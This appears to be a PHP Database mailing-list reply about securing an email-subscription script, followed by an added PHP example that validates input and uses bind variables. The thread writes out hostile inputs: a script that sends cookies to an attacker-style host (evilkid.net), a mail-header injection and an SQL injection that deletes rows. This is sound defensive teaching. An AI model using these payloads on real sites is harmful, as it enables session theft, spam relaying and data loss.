Re: insert (database)

Jochem Maas wrote:
> Yemi Obembe wrote:
>> the objective of the script below is to first search if a subscriber is already in a list before subscribing his email (so as to prevent double subscription). the select part works fine....but the insert doesn't. know why?
>> if ($v = strtolower($_POST['email'])) {
>
> what happens when $_POST['email'] is equal to
>
> '<script>
> document.location = "http://www.evilkid.net/?stolencookie"+document.cookie;
> </script>';
>
> or something like that? Just something to think about.

Then the malicious user gets to send their own cookies for this site to another site of their choosing :P. I would be more worried about it being equal to things like:


"Spam my Enemy <myenemy@xxxxxxxxxxx>"
+ "Spam my Enemy also <myenemy@xxxxxxxxxxx>"
+ etc.
  or
"\r\nFrom: Idiots Inc. <official@xxxxxxxxxxxxxxxxxx>"
  or
"'; Delete from arbitrary_table_name where 'yes'='yes"

All of which are easily prevented with some attention to detail (or, in some cases, newer versions of software, which explicitly allow only one statement per call). Finally, the concept of bind variables (or equivalent) is your friend (as Jochem already knows with Firebird, IIRC).

Cheers,
--
- Martin Norland, Database / Web Developer, International Outreach x3257
The opinion(s) contained within this email do not necessarily represent those of St. Jude Children's Research Hospital.


--
PHP Database Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
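
The defenses named in the reply above (attention to the input, plus bind variables), as an added example that is not code from the thread. The `subscribers` table, the function names, the in-memory SQLite database and the sample inputs are all assumptions constructed for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: returns a normalized address, or null if the input is unusable.
function normalizeEmail(string $raw): ?string
{
    // Reject CR/LF outright so the value can never add mail headers.
    if (preg_match('/[\r\n]/', $raw)) {
        return null;
    }
    // FILTER_VALIDATE_EMAIL accepts only a bare address, so "Name <addr>"
    // recipient lists, markup and SQL fragments containing spaces all fail.
    $email = filter_var(trim($raw), FILTER_VALIDATE_EMAIL);
    return $email === false ? null : strtolower($email);
}

// Hypothetical helper: returns 'rejected', 'subscribed' or 'duplicate'.
function subscribe(PDO $db, string $raw): string
{
    $email = normalizeEmail($raw);
    if ($email === null) {
        return 'rejected';
    }
    // Bind variable: the value is passed as data and never parsed as SQL.
    // The primary key plus INSERT OR IGNORE (SQLite syntax) replaces the
    // separate SELECT-then-INSERT duplicate check with one atomic statement.
    $stmt = $db->prepare('INSERT OR IGNORE INTO subscribers (email) VALUES (:email)');
    $stmt->execute([':email' => $email]);
    return $stmt->rowCount() === 1 ? 'subscribed' : 'duplicate';
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE subscribers (email TEXT PRIMARY KEY)');

// Constructed sample inputs, modelled on the cases raised in the thread.
$inputs = [
    'Reader@Example.com',
    'reader@example.com',                          // same subscriber, different case
    "o'brien@example.com",                         // valid address containing a quote
    'Spam my Enemy <myenemy@example.com>',
    "\r\nFrom: Idiots Inc. <official@example.com>",
    "'; Delete from arbitrary_table_name where 'yes'='yes",
    '<script>alert(1)</script>',
];
foreach ($inputs as $raw) {
    // Escape on output so echoed input is shown as text, not interpreted as markup.
    $shown = htmlspecialchars((string) json_encode($raw), ENT_QUOTES, 'UTF-8');
    printf("%-10s %s\n", subscribe($db, $raw), $shown);
}
```

The third input passes validation even though it contains a single quote, which is why the bind variable is still needed after the input check.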